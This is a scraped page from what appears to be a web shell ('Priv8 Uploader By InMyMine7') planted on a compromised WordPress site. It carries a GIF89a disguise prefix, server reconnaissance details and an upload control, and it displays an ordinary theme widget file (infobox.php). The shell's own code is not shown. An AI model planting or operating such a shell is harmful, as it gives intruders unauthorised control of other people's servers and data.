GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3

Priv8 Uploader By InMyMine7

Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
HEX
HEX
Server: Apache/2
System: Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
User: bs3263 (524)
PHP: 7.3.5
Disabled: NONE
Upload Files
File: /home/bs3263/domains/poolq.ee/old_old/wp-content/themes/Bright/lib/widgets/infobox.php
<?php

global $theme;

$themater_infobox_defaults = array(
    'title' => 'Info Box Title',
    'description' => 'Add your description here.',
    'link' => '',
    'more_label' => 'More &raquo;',
    'image' => '',
    'image_position' => 'before_title',
    'image_align' => 'aligncenter',
    'link_title' => 'true',
    'link_description' => '',
    'link_image' => ''
);

$theme->options['widgets_options']['infobox'] = is_array($theme->options['widgets_options']['infobox'])
    ? array_merge($themater_infobox_defaults, $theme->options['widgets_options']['infobox'])
    : $themater_infobox_defaults;
        
add_action('widgets_init', create_function('', 'return register_widget("ThematerInfoBox");'));

class ThematerInfoBox extends WP_Widget 
{
    function ThematerInfoBox() 
    {
        $widget_options = array('description' => __('Highlight a product or service with a custom image.', 'themater') );
        $control_options = array( 'width' => 480);
		$this->WP_Widget('themater_infobox', '&raquo; Info Box', $widget_options, $control_options);
    }

    function widget($args, $instance)
    {
        global $theme;
        extract( $args );
        $title = apply_filters('widget_title', $instance['title']);
        
        if($instance['image']) {
            $image_align = $instance['image_align'];
            if($instance['image_position'] == 'bottom') {
                $image_align .= ' inbottom';
            }
            if($instance['link_image'] && $instance['link']) {
                $output_image = '<a href="' . $instance['link'] .'"><img src="' . $instance['image'] .'" class="' . $image_align . '" /></a>';
            } else {
                $output_image = '<img src="' . $instance['image'] .'" class="' . $image_align . '" />';
            }
        } else {
            $output_image = false;
        }
         
        
        
    ?>
        <ul class="widget-wrap"><li class="infobox-widget">
            <?php
                if($output_image && $instance['image_position'] == 'before_title') {
                    echo $output_image;
                }
                
                if ($title) {
                    if($instance['link'] && $instance['link_title']) {
                        ?><h3 class="widgettitle"><a href="<?php echo $instance['link']; ?>"><?php echo $title; ?></a></h3><?php
                    } else {
                        ?><h3 class="widgettitle"><?php echo $title; ?></h3><?php
                    }
                }
             ?>
            <ul>
        	   <li class="infobox-widget-description">
                <?php
                    if($output_image && $instance['image_position'] == 'before_description') {
                        echo $output_image;
                    }
                    
                    if($instance['description']) {
                        if($instance['link'] && $instance['link_description']) {
                            echo '<a href="' . $instance['link'] .'">' . $instance['description'] .'<a/>';
                        } else {
                            echo $instance['description'];
                        }
                    }
                    
                    if($instance['link'] && $instance['more_label']) {
                        echo ' <a href="' . $instance['link'] .'" class="infobox-widget-more">' . $instance['more_label'] .'<a/>';
                    }
                    
                    if($output_image && $instance['image_position'] == 'bottom') {
                        echo $output_image;
                    }
                ?>
               </li>
            </ul>
        </li></ul>
        <?php
    }

    function update($new_instance, $old_instance) 
    {

    	$instance = $old_instance;
    	$instance['title'] = strip_tags($new_instance['title']);
        $instance['description'] = $new_instance['description'];
        $instance['link'] = strip_tags($new_instance['link']);
        $instance['more_label'] = $new_instance['more_label'];
        $instance['image'] = strip_tags($new_instance['image']);
        $instance['image_position'] = strip_tags($new_instance['image_position']);
        $instance['image_align'] = strip_tags($new_instance['image_align']);
        $instance['link_title'] = strip_tags($new_instance['link_title']);
        $instance['link_description'] = strip_tags($new_instance['link_description']);
        $instance['link_image'] = strip_tags($new_instance['link_image']);
        return $instance;
    }
    
    function form($instance) 
    {	
        global $theme;
		$instance = wp_parse_args( (array) $instance, $theme->options['widgets_options']['infobox'] );
        
        ?>
        
        <div class="tt-widget">
            <table width="100%">
                <tr>
                    <td class="tt-widget-label" width="25%"><label for="<?php echo $this->get_field_id('title'); ?>">Title:</label></td>
                    <td class="tt-widget-content" width="75%"><input class="widefat" id="<?php echo $this->get_field_id('title'); ?>" name="<?php echo $this->get_field_name('title'); ?>" type="text" value="<?php echo esc_attr($instance['title']); ?>" /></td>
                </tr>
                
                <tr>
                    <td class="tt-widget-label" width="25%"><label for="<?php echo $this->get_field_id('image'); ?>">Image Url:</label></td>
                    <td class="tt-widget-content" width="75%"><input class="widefat" id="<?php echo $this->get_field_id('image'); ?>" name="<?php echo $this->get_field_name('image'); ?>" type="text" value="<?php echo esc_attr($instance['image']); ?>" /></td>
                </tr>
                
                <tr>
                    <td class="tt-widget-label"><label for="<?php echo $this->get_field_id('description'); ?>">Description:</label></td>
                    <td class="tt-widget-content"><textarea class="widefat" id="<?php echo $this->get_field_id('description'); ?>" name="<?php echo $this->get_field_name('description'); ?>" style="height: 160px;"><?php echo esc_attr($instance['description']); ?></textarea></td>
                </tr>
                
                <tr>
                    <td class="tt-widget-label" width="25%"><label for="<?php echo $this->get_field_id('link'); ?>">Link Url:</label></td>
                    <td class="tt-widget-content" width="75%"><input class="widefat" id="<?php echo $this->get_field_id('link'); ?>" name="<?php echo $this->get_field_name('link'); ?>" type="text" value="<?php echo esc_attr($instance['link']); ?>" /></td>
                </tr>
                
                <tr>
                    <td class="tt-widget-label" width="25%"><label for="<?php echo $this->get_field_id('more_label'); ?>">"Read More" Label:</label></td>
                    <td class="tt-widget-content" width="75%"><input class="widefat" id="<?php echo $this->get_field_id('more_label'); ?>" name="<?php echo $this->get_field_name('more_label'); ?>" type="text" value="<?php echo esc_attr($instance['more_label']); ?>" /></td>
                </tr>
                
                <tr>
                    <td class="tt-widget-label">Image Options:</td>
                    <td class="tt-widget-content">
                        Position: <select name="<?php echo $this->get_field_name('image_position'); ?>">
                            <option value="before_title" <?php selected('before_title', $instance['image_position']); ?> >Before Title</option>
                            <option value="before_description"  <?php selected('before_description', $instance['image_position']); ?>>Before Description</option>
                            <option value="bottom" <?php selected('bottom', $instance['image_position']); ?>>Bottom</option>
                        </select>
                        
                         &nbsp; Float: <select name="<?php echo $this->get_field_name('image_align'); ?>">
                            <option value="alignleft" <?php selected('alignleft', $instance['image_align']); ?> >Left</option>
                            <option value="alignright"  <?php selected('alignright', $instance['image_align']); ?>>Right</option>
                            <option value="aligncenter" <?php selected('aligncenter', $instance['image_align']); ?>>Center</option>
                        </select>
                    </td>
                </tr>
                
                <tr>
                    <td class="tt-widget-label">Add Links To:</td>
                    <td class="tt-widget-content">
                        <input type="checkbox" name="<?php echo $this->get_field_name('link_title'); ?>"  <?php checked('true', $instance['link_title']); ?> value="true" />  Title
                        <br /><input type="checkbox" name="<?php echo $this->get_field_name('link_description'); ?>"  <?php checked('true', $instance['link_description']); ?> value="true" /> Description
                        <br /><input type="checkbox" name="<?php echo $this->get_field_name('link_image'); ?>"  <?php checked('true', $instance['link_image']); ?> value="true" />  Image
                    </td>
                </tr>
                
            </table>
          </div>
        <?php 
    }
} 
?>